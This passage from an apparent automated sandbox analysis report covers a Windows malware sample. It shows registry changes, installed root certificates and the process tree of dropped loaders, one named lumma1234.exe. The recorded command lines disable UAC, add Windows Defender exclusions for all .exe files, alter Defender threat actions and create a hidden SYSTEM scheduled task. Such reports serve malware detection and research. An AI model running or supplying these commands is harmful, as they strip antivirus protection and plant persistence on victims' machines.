580c8a913acbe88ef3a6eab5f2a386202b0127bfe8fa6030203010001a3663064301106096086480186f8420101040403020007300f0603551d130101ff040530030101ff301f0603551d230418301680144a78325211db5916365edfc11436406a477c4ca1301d0603551d0e041604144a78325211db5916365edfc11436406a477c4ca1300d06092a864886f70d010104050003818100755ba89b0311e6e9564ccdf9a94cc00d9af3cc6569e62576cc59b7d654c31dcd99ac19ddb485d5e03dfc6220a7844b5865f1e2f995213ff5d47e581e4787543e58a1b5b5f82aef71e7bcc3f6b14946e2d7a06be5567a9a27987c466214e7c9fc6e03127980381d48828dfc17fe2a962bb562a6a63dbd7f9259cd5a2a82b23779 | C:\Program Files (x86)\1717040751_0\360TS_Setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4394CE3126FF1A224CDD4DEEB4F4EC1DA368EF6A | C:\Program Files (x86)\1717040751_0\360TS_Setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\245C97DF7514E7CF2DF8BE72AE957B9E04741E85 | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\A43489159A520F0D93D032CCAF37E7FE20A8B419\Blob = 1400000001000000140000004a5c7522aa46bfa4089d39974ebdb4a360f7a01d69000000010000000e000000300c060a2b0601040182373c03020b00000001000000320000004d006900630072006f0073006f0066007400200052006f006f007400200041007500740068006f0072006900740079000000030000000100000014000000a43489159a520f0d93d032ccaf37e7fe20a8b41920000000010000001604000030820412308202faa003020102020f00c1008b3c3c8811d13ef663ecdf40300d06092a864886f70d01010405003070312b3029060355040b1322436f70797269676874202863292031393937204d6963726f736f667420436f72702e311e301c060355040b13154d6963726f736f667420436f72706f726174696f6e3121301f060355040313184d6963726f736f667420526f6f7420417574686f72697479301e170d3937303131303037303030305a170d3230313233313037303030305a3070312b3029060355040b1322436f70797269676874202863292031393937204d6963726f736f667420436f72702e311e301c060355040b13154d6963726f736f667420436f72706f726174696f6e3121301f060355040313184d6963726f736f667420526f6f7420417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a0282010100a902bdc170e63bf24e1b289f97785e30eaa2a98d255ff8fe954ca3b7fe9da2203e7c51a29ba28f60326bd1426479eeac76c954daf2eb9c861c8f9f8466b3c56b7a6223d61d3cde0f0192e896c4bf2d669a9a682699d03a2cbf0cb55826c146e70a3e38962ca92839a8ec498342e3840fbb9a6c5561ac827ca1602d774ce999b4643b9a501c310824149fa9e7912b18e63d986314605805659f1d375287f7a7ef9402c61bd3bf5545b38980bf3aec54944eaefda77a6d744eaf18cc96092821005790606937bb4b12073c56ff5bfba4660a08a6d2815657efb63b5e16817704daf6beae8095feb0cd7fd6a71a725c3ccabcf008a32230b30685c9b320771385df0203010001a381a83081a53081a20603551d0104819a30819780105bd070ef69729e23517e14b24d8effcba1723070312b3029060355040b1322436f70797269676874202863292031393937204d6963726f736f667420436f72702e311e301c060355040b13154d6963726f736f667420436f72706f726174696f6e3121301f060355040313184d6963726f736f667420526f6f7420417574686f72697479820f00c1008b3c3c8811d13ef663ecdf40300d06092a864886f70d0101040500038201010095e80bc08df3971835edb80124d87711f35c60329f9e0bcb3e0591888fc93ae621f2f057932cb5a047c862effcd7cc3b3b5aa9365469fe246d3fc9ccaade057cdd318d3d9f10706abbfe124f1869c0fcd043e3115a204fea627bafaa19c82b37252dbe65a1128a250f63a3f7541cf921c9d615f352ac6e433207fd8217f8e5676c0d51f6bdf152c7bde7c430fc203109881d95291a4dd51d02a5f180e003b45bf4b1ddc857ee6549c75254b6b4032812ff90d6f0088f7eb897c5ab372ce47ae4a877e376a000d06a3fc1d2368ae04112a8356a1b6adb35e1d41c04e4a84504c85a33386e4d1c0d62b70aa28cd3d5543f46cd1c55a670db123a8793759fa7d2a0 | C:\Program Files (x86)\1717040751_0\360TS_Setup.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\CABB51672400588E6419F1D40878D0403AA20264\Blob = 0b000000010000006c0000004a006100700061006e002000430065007200740069006600690063006100740069006f006e002000530065007200760069006300650073002c00200049006e0063002e0020005300650063007500720065005300690067006e00200052006f006f0074004300410031000000090000000100000016000000301406082b0601050507030406082b06010505070301030000000100000014000000cabb51672400588e6419f1d40878d0403aa2026420000000010000002d030000308203293082021102085f60585f00000000300d06092a864886f70d01010505003057310b3009060355040613024a50312b3029060355040a13224a6170616e2043657274696669636174696f6e2053657276696365732c20496e632e311b3019060355040313125365637572655369676e20526f6f74434131301e170d3939303931353135303030315a170d3230303931353134353935395a3057310b3009060355040613024a50312b3029060355040a13224a6170616e2043657274696669636174696f6e2053657276696365732c20496e632e311b3019060355040313125365637572655369676e20526f6f7443413130820122300d06092a864886f70d01010105000382010f003082010a028201010094900c4b71291cdaf668797aa4bae7d2cc8dafe84790991fc62aea9763e81fce1757c61ab3a8c77c87ed353580baba6e6dbe17fecc2d1b6cef8a004916e1ee065e4a075dab3dd150b89146d4d4da15d8945c0ecad7dabfa0f7493cc8bbceea26810a142d9c0d37456b41ca578b38f0261f31fccf348e8f77c13fe3ab543c27b4ce324c551362fcfe3a1625cf1b6ba223b7e0ea0269bbf722716d7c0b1993a1979ce391691f68e42f7d106d8f67aec110a2b05e634a97f7e678a9ad26bb54c9dfb4eec59ed325dd136853f98fe8ece5de81d6783eee5040b4013cac15c1823b2e7ff152278b72e0e7dbf98b29c3c34a2b3389ab5c2a07fc7c231e2b4f0822fec10203010001300d06092a864886f70d0101050500038201010055ed6f7b93e545314e68d55581a2081f6cdd09c5781a7057c8df0881ae6677c6750fe4ef498b035c6cff1c90a472b2d31612b206f84686aebfa715db854dfac22d4db3b5b043ef7c7e07db5fb357465176078644fd07eaf1cb4b454d66a73326c4f943aa8d12b3d48d68b6f70279b42d5ad70398042c6999aff4663b64acb2c02bc869549e4c4e48188dce57b53b51e51bd7fa3960db564513bee766d523f67c4800b04cef348d22acb22ed14c38cdfa580306ee3a73870a053acae4afd4c1ee1c857f2516cf27011f848a7708d0d346e820ec9fa48cf1bccdc41236801ec70928afe808bec0d3b23ed72e673da3cebb34fae285cdacce551d455b7885d3857a | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\8EFDCABC93E61E925D4D1DED181A4320A467A139 | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A14B48D943EE0A0E40904F3CE0A4C09193515D3F\Blob = 030000000100000014000000a14b48d943ee0a0e40904f3ce0a4c09193515d3f090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080b00000001000000380000004400690067006900430065007200740020004100730073007500720065006400200049004400200052006f006f00740020004700320000005300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c020000000010000009a030000308203963082027ea00302010202100b931c3ad63967ea6723bfc3af9af44b300d06092a864886f70d01010b05003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100d9e7282f523f367249889334f3f86a1e3154809fad5441b547df96a8d4af802db90acf75fd89a57d24fae3220c2bbc95170b33bf194d41069000bd0c4d10fe07b5e71c6e2255316597bdd317d21e62f3dbea6c508c3f840c96cfb7cb03e0ca6da1144c1b89dded00b0527caf916cb13813d1e91208c000b01c2b11da7770369baece7987dc8270e60974705569afa3689fbfddb679b3f29d702955f4abff9561f3c9406f1dd1be93bbd3882abb9dbf725a56713b3fd4f3d10afe28efa3eed999af03d38f60b7f292a1b1bd89891f30cdc3a62e6233ae160277445ae7810a3ca7442e79b83f04bc5ca087e11baf518ecdec2cfaf8fe6df03a7caa8be46795318d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414cec34ab99955f2b8db60bfa97ebd56b59736a7d6300d06092a864886f70d01010b05000382010100caa5558ce3c8416e6927a77511ef3c86366fd29dc678381d6996a292692e386c9b7d04d489a5b131378ac921ccab6ccd8b1c9ad6bf48d23266c18ac0f32f3aefc0e3d49186d150e303db73776f4a3953edde26c7b57daf2b42d17562e34a2b02c7504be069e2966c0e446610448fad05ebf879aca61be837349d53c961aaa252af4a701686c23ac8b1137036d8cfeef40a34d55b4cfd079ca2bad901725cf34dc1dd0eb11c0dc463beadf414fb89eca2410e4cccc85740d06e03aacd0c8e8999996cf03c30af38df6fbca3be292027ab74ff132278de9752551e83b5542003eeaec04f56de37ccc37faa0427bbd377b862db177c9c282213736ccf26f58a29e7 | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Program Files (x86)\1717040751_0\360TS_Setup.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\1717040751_0\360TS_Setup.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\62ff8a0e3f1d6be4a1fcd7500524d92861270e431b487f36130ef39945482a22_NeikiAnalytics.exe | N/A |
| N/A | N/A | C:\Users\Admin\Pictures\VXKpcjhGma26EPGkmvK7SjAl.exe | N/A |
| N/A | N/A | C:\Users\Admin\Pictures\KUjGJaECFDsncDIjZI6NJy59.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\360\Total Security\safemon\PopWndLog.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\1717040751_0\360TS_Setup.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Pictures\VXKpcjhGma26EPGkmvK7SjAl.exe | N/A |
| N/A | N/A | C:\Users\Admin\Pictures\KUjGJaECFDsncDIjZI6NJy59.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\360\Total Security\safemon\PopWndLog.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\1717040751_0\360TS_Setup.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\360\Total Security\safemon\PopWndLog.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe | N/A |
Suspicious use of UnmapMainImage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe | N/A |
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\62ff8a0e3f1d6be4a1fcd7500524d92861270e431b487f36130ef39945482a22_NeikiAnalytics.exe
"C:\Users\Admin\AppData\Local\Temp\62ff8a0e3f1d6be4a1fcd7500524d92861270e431b487f36130ef39945482a22_NeikiAnalytics.exe"
C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
"C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe"
C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe
"C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 292 -s 72
C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe
"C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe"
C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe
"C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3052 -s 68
C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe
"C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 584 -s 72
C:\Users\Admin\AppData\Local\Temp\1000009001\swizzzz.exe
"C:\Users\Admin\AppData\Local\Temp\1000009001\swizzzz.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2872 -s 96
C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe
"C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe" -Force
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 1280 -s 760
C:\Users\Admin\Pictures\KUjGJaECFDsncDIjZI6NJy59.exe
"C:\Users\Admin\Pictures\KUjGJaECFDsncDIjZI6NJy59.exe" /s
C:\Users\Admin\Pictures\pNS5nWFOnPuRyVaJWEap6nB1.exe
"C:\Users\Admin\Pictures\pNS5nWFOnPuRyVaJWEap6nB1.exe"
C:\Users\Admin\Pictures\VXKpcjhGma26EPGkmvK7SjAl.exe
"C:\Users\Admin\Pictures\VXKpcjhGma26EPGkmvK7SjAl.exe"
C:\Users\Admin\Pictures\360TS_Setup.exe
"C:\Users\Admin\Pictures\360TS_Setup.exe" /c:WW.Marketator.CPI20230405 /pmode:2 /s /promo:eyJib290dGltZSI6IjciLCJtZWRhbCI6IjciLCJuZXdzIjoiMCIsIm9wZXJhIjoiNyIsIm9wZXJhX2lucyI6IjAiLCJwb3B1cCI6IjciLCJyZW1pbmRlciI6IjciLCJ1cGdyYWRlX25vdyI6IjAifQo=
C:\Program Files (x86)\1717040751_0\360TS_Setup.exe
"C:\Program Files (x86)\1717040751_0\360TS_Setup.exe" /c:WW.Marketator.CPI20230405 /pmode:2 /s /promo:eyJib290dGltZSI6IjciLCJtZWRhbCI6IjciLCJuZXdzIjoiMCIsIm9wZXJhIjoiNyIsIm9wZXJhX2lucyI6IjAiLCJwb3B1cCI6IjciLCJyZW1pbmRlciI6IjciLCJ1cGdyYWRlX25vdyI6IjAifQo= /TSinstall
C:\Users\Admin\Pictures\MjDfCYk2Z01cHjUDjbG5PWD3.exe
"C:\Users\Admin\Pictures\MjDfCYk2Z01cHjUDjbG5PWD3.exe"
C:\Users\Admin\AppData\Local\Temp\7zSE36C.tmp\Install.exe
.\Install.exe
C:\Users\Admin\AppData\Local\Temp\7zSE4E3.tmp\Install.exe
.\Install.exe /NQHxdidUQs "385118" /S
C:\Windows\SysWOW64\regsvr32.exe
"C:\Windows\system32\regsvr32.exe" /s "C:\Program Files (x86)\360\Total Security\MenuEx64.dll"
C:\Windows\system32\regsvr32.exe
/s "C:\Program Files (x86)\360\Total Security\MenuEx64.dll"
C:\Program Files (x86)\360\Total Security\Utils\PowerSaver.exe
"C:\Program Files (x86)\360\Total Security\Utils\PowerSaver.exe" /flightsigning
C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe
"C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe" /install
C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe
"C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe"
C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe
/showtrayicon
C:\Program Files (x86)\360\Total Security\safemon\QHWatchdog.exe
"C:\Program Files (x86)\360\Total Security\safemon\QHWatchdog.exe" /install
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
C:\Program Files (x86)\360\Total Security\safemon\PopWndLog.exe
"C:\Program Files (x86)\360\Total Security\safemon\PopWndLog.exe" /cleantip=1
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
C:\Windows\SysWOW64\regsvr32.exe
C:\Windows\system32\regsvr32.exe /s "C:\Program Files (x86)\360\Total Security\safemon\safemon.dll"
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Program Files (x86)\360\Total Security\safemon\QHWatchdog.exe
"C:\Program Files (x86)\360\Total Security\safemon\QHWatchdog.exe" /watch
C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe
"C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe"
C:\Windows\SysWOW64\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Program Files (x86)\360\Total Security\modules\KB931125-rootsupd.exe
"C:\Program Files (x86)\360\Total Security\modules\KB931125-rootsupd.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe authroots.sst
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe updroots.sst
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe -l roots.sst
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe -d delroots.sst
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bqGGCwwWIommTRgeuN" /SC once /ST 03:47:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\SiHRhjyUhlpwxPXaT\frDbhUXJJbPEeVC\VkQpaXL.exe\" 1g /WIgdidLzVB 385118 /S" /V1 /F
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bqGGCwwWIommTRgeuN"
C:\Windows\SysWOW64\cmd.exe
/C schtasks /run /I /tn bqGGCwwWIommTRgeuN
\??\c:\windows\SysWOW64\schtasks.exe
schtasks /run /I /tn bqGGCwwWIommTRgeuN
C:\Windows\system32\taskeng.exe
taskeng.exe {999A5A2F-10D4-4FFC-871D-C03F6480EAB9} S-1-5-18:NT AUTHORITY\System:Service:
C:\Users\Admin\AppData\Local\Temp\SiHRhjyUhlpwxPXaT\frDbhUXJJbPEeVC\VkQpaXL.exe
C:\Users\Admin\AppData\Local\Temp\SiHRhjyUhlpwxPXaT\frDbhUXJJbPEeVC\VkQpaXL.exe 1g /WIgdidLzVB 385118 /S
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
